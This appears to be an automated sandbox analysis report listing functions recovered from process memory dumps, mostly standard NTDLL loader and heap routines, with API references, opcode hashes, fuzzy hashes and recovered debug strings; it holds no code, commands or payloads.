Instruction Fuzzy Hash: AD90023120110413D5226299460474B405947D0641FD5C91AA5514D58DD666C952B561

Uniqueness

Uniqueness Score: -1.00%

Function 1E9D2B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E9D2B9A

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c95706b98b1f16e7c0a4cf8eee38e1c9d51bc2773977dff23a093a7277eb50a
Instruction ID: 1420d5890ba5c1f7ebd7ec576c2382c702634fe31e83d8ed94195e4df36d2f14
Opcode Fuzzy Hash: 0c95706b98b1f16e7c0a4cf8eee38e1c9d51bc2773977dff23a093a7277eb50a
Instruction Fuzzy Hash: 4890023120118802D5216299850478E405547D0701F99C919A9514E58DC6A5C8917561

Uniqueness

Uniqueness Score: -1.00%

Function 1E9D2BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E9D2BCA

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01f3e66bf2642447a4855a927eda7d672f14aca7e69ed0f75867eb7afea918b1
Instruction ID: a638d641dd2da29e380298b65e0141943073e5ccb75d06ed8ebd82d28f779623
Opcode Fuzzy Hash: 01f3e66bf2642447a4855a927eda7d672f14aca7e69ed0f75867eb7afea918b1
Instruction Fuzzy Hash: D290023120110402D51166D9550868A405547E0701F95D519AA114D55EC675C8917571

Uniqueness

Uniqueness Score: -1.00%

Function 1E9D2B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E9D2B1A

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05231850932d2a7c50baa65bab280534aff2dd599c41bba1c13f9ee95fec5b63
Instruction ID: f28fbdef74fcf48988f0adfbfebea406fa88cef2d69222287b70a6b5f2781327
Opcode Fuzzy Hash: 05231850932d2a7c50baa65bab280534aff2dd599c41bba1c13f9ee95fec5b63
Instruction Fuzzy Hash: A490023120110802D5917299450468E405547D1701FD5C51DA5115E54DCA25CA597BE1

Uniqueness

Uniqueness Score: -1.00%

Function 1E9D29F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E9D29FA

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5f9fd35504cbd049c7f005a28e3ca772177c85352f947341f07ab30db4f2c75
Instruction ID: f6601306b1d236b8afe727531b44d9380cedac1e39cd10c37fca7a0fb454636d
Opcode Fuzzy Hash: e5f9fd35504cbd049c7f005a28e3ca772177c85352f947341f07ab30db4f2c75
Instruction Fuzzy Hash: F4900225211100034516A699070454B409647D5751395C529F6105D50CD631C8616561

Uniqueness

Uniqueness Score: -1.00%

Function 0056C1E4, Relevance: 1.6, APIs: 1, Instructions: 143threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(AC261CBD,-C650A82B), ref: 0056C2B9

Memory Dump Source

Source File: 00000003.00000002.33046253484.000000000056C000.00000040.00000001.sdmp, Offset: 0056C000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 69526c9aa78bfc6b6bae87ea58518e8bf3f7d140f8a40fc34827b8437371574c
Instruction ID: 9cdc9705fc4cd7b9d17c90988d66e2357677376c5fc159ca5953905b4ca95eb0
Opcode Fuzzy Hash: 69526c9aa78bfc6b6bae87ea58518e8bf3f7d140f8a40fc34827b8437371574c
Instruction Fuzzy Hash: 1731E8316043858FDB30CF24C8E5BF67FD2BF61316F5A9156C8894B2A2C7758885CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0056C2F9, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.33046253484.000000000056C000.00000040.00000001.sdmp, Offset: 0056C000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8185111baad0d4bc834f4fcc7cc59415387d52ff798ecce1ae01093c780259f5
Instruction ID: c59af1475050e88cad1f94276f92380f0160a26d4f29117a760896fcf7f22368
Opcode Fuzzy Hash: 8185111baad0d4bc834f4fcc7cc59415387d52ff798ecce1ae01093c780259f5
Instruction Fuzzy Hash: 9421D5356002858FDB34CB25D4B97B67FD2BF9132BF5A92A9C4960B2A2C73598C5CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0056C305, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.33046253484.000000000056C000.00000040.00000001.sdmp, Offset: 0056C000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42abbe4e768e332e961c04eb51591a788bca181e0e1b2f7e8ad0e1b2c6abe99d
Instruction ID: ca8beccc9c9d34d9bd22e98c6d10f0289a0704b4be43794b7456e627ea53a246
Opcode Fuzzy Hash: 42abbe4e768e332e961c04eb51591a788bca181e0e1b2f7e8ad0e1b2c6abe99d
Instruction Fuzzy Hash: CA11B7315002858FDF34CA25D4B57B57FD2BF9132BF5A92A9C4960B2E2C73598C5CA01

Uniqueness

Uniqueness Score: -1.00%

Function 0056C2E1, Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(AC261CBD,-C650A82B), ref: 0056C2B9

Memory Dump Source

Source File: 00000003.00000002.33046253484.000000000056C000.00000040.00000001.sdmp, Offset: 0056C000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: ff1e8c0c69551b3d7b96184a3204a1c3850ff446d0be10903f3f97a78b9e654e
Instruction ID: e10698de7ed9ee8da9a3e09d3ff04c80a902d328ae2dc0c70e40dc28be4377f9
Opcode Fuzzy Hash: ff1e8c0c69551b3d7b96184a3204a1c3850ff446d0be10903f3f97a78b9e654e
Instruction Fuzzy Hash: FB1146345042858FDF348B24D4B9BB57FD2BF5132BF5A92A9C4960B2A2C73898C9CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1E9D2B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E9D2B44

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec5466ad665660baff14aeaecdd7476ca08550f1c55bd801f47e280d72e3650a
Instruction ID: 03e23adadac3dcaae068f7bb025d2bd792bb08eb7f3906956b1a33ac8bc76e3b
Opcode Fuzzy Hash: ec5466ad665660baff14aeaecdd7476ca08550f1c55bd801f47e280d72e3650a
Instruction Fuzzy Hash: 2AB02B318011C1C5D602D7A0070870B7D0437C0B00F25C15AD2020A40E433CC080F571

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1EA3FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA3FE28

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1EA4026A
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 1EA4021F
About to reallocate block at %p to %Ix bytes, xrefs: 1EA3FF3A
HEAP[%wZ]: , xrefs: 1EA3FF19, 1EA40028, 1EA40150, 1EA401F5, 1EA4024C
HEAP: , xrefs: 1EA3FF26, 1EA40035, 1EA4015D, 1EA40202, 1EA40259
Just reallocated block at %p to %Ix bytes, xrefs: 1EA40171
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 1EA40053
RtlReAllocateHeap, xrefs: 1EA3FE3F, 1EA3FEE2

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 2e2f40a7f7bc5c210366e5d6bcc6616467335e03b9310886dbd1c25f23d70af4
Instruction ID: 7fe7bef497e61cfc2b70550f942936ed1f2e96a05125040a9b2fa40734e92087
Opcode Fuzzy Hash: 2e2f40a7f7bc5c210366e5d6bcc6616467335e03b9310886dbd1c25f23d70af4
Instruction Fuzzy Hash: F2D10239510285DFCB02CFA8C490AADBBF2FF89700F29865DE485AB261D335AD41DF19

Uniqueness

Uniqueness Score: -1.00%

Function 1EA3F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA3F92E

Strings

RtlFreeHeap, xrefs: 1EA3F948, 1EA3F9B2
HEAP[%wZ]: , xrefs: 1EA3F9EC, 1EA3FAD7
About to free block at %p, xrefs: 1EA3FA0A
HEAP: , xrefs: 1EA3F9F9, 1EA3FAE4
About to free block at %p with tag %ws, xrefs: 1EA3FAFE

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: ca0b8f3f716f0e014c014eb86d961df8ec656323c2d087db1ca0d3b9433e95e3
Instruction ID: 15d7c1be670d087072b6251f1b18b17a8247d8e8e4699135d0d80e50d887b7d8
Opcode Fuzzy Hash: ca0b8f3f716f0e014c014eb86d961df8ec656323c2d087db1ca0d3b9433e95e3
Instruction Fuzzy Hash: 4471D2389106859FCB01CFA8D490AEDFBF6FF89305F28865EE4819B361C7359981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 1E9BD6D0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9BD879

Part of subcall function 1E994779: RtlDebugPrintTimes.NTDLL ref: 1E994817

Strings

minkernel\ntdll\ldrinit.c, xrefs: 1E9FF0E2
LdrShutdownProcess, xrefs: 1E9FF0D8
$, xrefs: 1E9BD820
Process 0x%p (%wZ) exiting, xrefs: 1E9FF0D1
$, xrefs: 1E9BD78D

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 5a62dca5d0edb73ffc9c0794b07ef2b582de99cadd40593e41e4733cbab0218c
Instruction ID: e8dc860a3ea8c123205a1a322d9414e69a3c8fc03aa941f1ced0516fe6e8b376
Opcode Fuzzy Hash: 5a62dca5d0edb73ffc9c0794b07ef2b582de99cadd40593e41e4733cbab0218c
Instruction Fuzzy Hash: D851DEB5A042869FDB06CFA8C594FCDBBB2BF84314F14465DD904AB281D774A986CF81

Uniqueness

Uniqueness Score: -1.00%

Function 1E9BDA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9FF41B

Strings

, passed to %s, xrefs: 1E9FF46C
Invalid heap signature for heap at %p, xrefs: 1E9FF45D
HEAP[%wZ]: , xrefs: 1E9FF444
HEAP: , xrefs: 1E9FF451
RtlUnlockHeap, xrefs: 1E9FF467

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 8b709b222753a35af12016f1d5f3a6d25a9b270d1416cc8b42ce9f7251f72037
Instruction ID: cf135cc30ae5fbdb0ebcc3533c431f175ef2c09f9cd996ad4b7d368d1e5de791
Opcode Fuzzy Hash: 8b709b222753a35af12016f1d5f3a6d25a9b270d1416cc8b42ce9f7251f72037
Instruction Fuzzy Hash: 3F414935914685EFDB12CF28C898F59BBA9FF85324F044B6DD40657391C738A980CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E9BDAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9FF561

Strings

, passed to %s, xrefs: 1E9FF5B2
Invalid heap signature for heap at %p, xrefs: 1E9FF5A3
HEAP[%wZ]: , xrefs: 1E9FF58A
HEAP: , xrefs: 1E9FF597
RtlLockHeap, xrefs: 1E9FF5AD

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 12e2cf83931a977783707b865404c5d8cc709ef1297f5ab748b5c41d8bdfb266
Instruction ID: 8690b2efb061b55d68902122576613441a1ef16b1401bc0bc6e453cc8ff6b718
Opcode Fuzzy Hash: 12e2cf83931a977783707b865404c5d8cc709ef1297f5ab748b5c41d8bdfb266
Instruction Fuzzy Hash: 0C3153355106D8EFDB13CB28C818F997BA8FB01724F040B8DE4424B7A1D769A980CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1E9A0680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 1E9F4EBB
(UCRBlock->Size >= *Size), xrefs: 1E9F4ED7
HEAP: , xrefs: 1E9F4ECA

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: a77f3831a3419816d358123aafae8111b00dd9fe0d2c594ec6dc8699b36ed982
Instruction ID: b9f5b6e3d87f2a7ea5e23ee597040ef1a4b63ebe4f0f4701697f653dfe5e58fe
Opcode Fuzzy Hash: a77f3831a3419816d358123aafae8111b00dd9fe0d2c594ec6dc8699b36ed982
Instruction Fuzzy Hash: E6F1BD74A00646DFDB05CF69C894B6ABBBAFF84300F1486ACE5099B385D774E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E98F8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9EE51F

Strings

HEAP[%wZ]: , xrefs: 1E9EE490
HEAP: , xrefs: 1E9EE49D
(HeapHandle != NULL), xrefs: 1E9EE4A8

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: cb0f8684db2def895c67710bf040a8eed91634f67fdf0b5d94ef68f6b0f70b80
Instruction ID: 570a89a37ae69e5f51cce7a1ff60c96b360511a22be12e0a3c91a5f94f76dbc3
Opcode Fuzzy Hash: cb0f8684db2def895c67710bf040a8eed91634f67fdf0b5d94ef68f6b0f70b80
Instruction Fuzzy Hash: F1911635204799ABC307CB24C894F1EB7AAFF84A00F041B5DFA459B691EB34E885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E9B9723, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9B9922

Strings

LdrpUnloadNode, xrefs: 1E9FDAF5
Unmapping DLL "%wZ", xrefs: 1E9FDAEE
minkernel\ntdll\ldrsnap.c, xrefs: 1E9FDAFF

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 17e3e72c49c200f7adf9ff3174ffbdf2521a80ebb48bca5bc3b89cf2cc807d2f
Instruction ID: 9e726e9bff016ebea97e0a486fd9497ab9572500cfffa060ec97625e5c38dabf
Opcode Fuzzy Hash: 17e3e72c49c200f7adf9ff3174ffbdf2521a80ebb48bca5bc3b89cf2cc807d2f
Instruction Fuzzy Hash: 9C51F1316202829BD716DF38C8D4F5977E6BFC8714F180B2DE5529B695EB30A805CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6ACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6AEA9
RtlDebugPrintTimes.NTDLL ref: 1EA6B185

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6b5917ef5ca9db5d0d66f5ab06249f6d2c9e46508ab92fd12e07800dcfe0de13
Instruction ID: 91e949bfd06d9c1c9b95caa83bc12d0244e964ae444b3a27ae3ed4f0f7ae828b
Opcode Fuzzy Hash: 6b5917ef5ca9db5d0d66f5ab06249f6d2c9e46508ab92fd12e07800dcfe0de13
Instruction Fuzzy Hash: 5EF1E672E006619FCB18CFA9C9A067EFBF6AF8D20071A426DD466DB384D634ED41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1E9958E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 1E9F08AE

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f1facf3d1c8b737017d9ff6a74dc60b16878b90e7eb04fa35a52db6dc45f91a1
Instruction ID: d2c4950f77577bf293b026b96a2b7a6d96f63d0573e62bef03a0cd8e92924639
Opcode Fuzzy Hash: f1facf3d1c8b737017d9ff6a74dc60b16878b90e7eb04fa35a52db6dc45f91a1
Instruction Fuzzy Hash: A6325874D042AADFDB21CF65C844BDEBBB5BB48304F0086EDD449A7241D7756A84EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6A1F0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6A25D
RtlDebugPrintTimes.NTDLL ref: 1EA6A2F1
RtlDebugPrintTimes.NTDLL ref: 1EA6A314
RtlDebugPrintTimes.NTDLL ref: 1EA6A340
RtlDebugPrintTimes.NTDLL ref: 1EA6A415
RtlDebugPrintTimes.NTDLL ref: 1EA6A468
RtlDebugPrintTimes.NTDLL ref: 1EA6A487
RtlDebugPrintTimes.NTDLL ref: 1EA6A4B8

Strings

HEAP: , xrefs: 1EA6A206

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 9dddb9ba48f5e022be3a79cfe80a80b78b363b6f274fc73f9bdd1886b4172f7d
Instruction ID: 08546bcd42785d2f2b2fb543145dae3a8ba2a2e3230cc6da9b73d3ac3773b75b
Opcode Fuzzy Hash: 9dddb9ba48f5e022be3a79cfe80a80b78b363b6f274fc73f9bdd1886b4172f7d
Instruction Fuzzy Hash: 00A19C75A143128FC705CE2AC8A4A2AB7E6FF8D710F15466DE946DB321E730EC41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1E9C7550, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1EA0454D
ExecuteOptions, xrefs: 1EA044AB
CLIENT(ntdll): Processing section info %ws..., xrefs: 1EA04592
Execute=1, xrefs: 1EA0451E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1EA04507
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1EA04460
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1EA04530

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 99088872ea08627f2ad173fa4059079ad597fa8e88d5d52183ec7985590debec
Instruction ID: f6c17137a06d8c3f9a1754d0b7bde9ed57bc6374798d04f9a416e8a88159f276
Opcode Fuzzy Hash: 99088872ea08627f2ad173fa4059079ad597fa8e88d5d52183ec7985590debec
Instruction Fuzzy Hash: 82512771A002996BEB11ABB5ED95FED73ADBF48300F000BADE505A7180D730AE458F66

Uniqueness

Uniqueness Score: -1.00%

Function 1E9AA170, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

SsHd, xrefs: 1E9AA304
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9F78F3
RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9F77DD, 1E9F7802
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9F7807
Actx , xrefs: 1E9F7819, 1E9F7880
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9F77E2

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: bcbf613c051b14683d4e00909b466ddb4c34899a76a8e46d76466ee3d2ae6493
Instruction ID: 9ea42186f4e9b73fabd82b874067bb17f975d6200b46ef210896420ae78e9fec
Opcode Fuzzy Hash: bcbf613c051b14683d4e00909b466ddb4c34899a76a8e46d76466ee3d2ae6493
Instruction Fuzzy Hash: 98E1AE70A143428FD716CE25C894B5E7BEABFC4224F104B2DEA66CB290D7B9D845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E9AD690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9F9299

Strings

RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E9F9372
GsHd, xrefs: 1E9AD794
RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9F914E, 1E9F9173
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9F9178
Actx , xrefs: 1E9F9315
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9F9153

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: c1dcbb407d5a48a491fa26ba86fb2cd01d8673cb69f38e0a4983c6bde2b4f131
Instruction ID: 3d316f7e85e446086efd2eb4a819ddc2e06ad7d094c3a31a042de9268658a9b3
Opcode Fuzzy Hash: c1dcbb407d5a48a491fa26ba86fb2cd01d8673cb69f38e0a4983c6bde2b4f131
Instruction Fuzzy Hash: 1EE15B70A04342DBD711CF59C880B9ABBE9BFC8318F044B2DEA958B295D771E945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1EA3F0A5, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA3F0D6

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1EA3F389
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 1EA3F33E
HEAP[%wZ]: , xrefs: 1EA3F267, 1EA3F314, 1EA3F36B
Just allocated block at %p for %Ix bytes, xrefs: 1EA3F288
HEAP: , xrefs: 1EA3F274, 1EA3F321, 1EA3F378
RtlAllocateHeap, xrefs: 1EA3F0ED

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
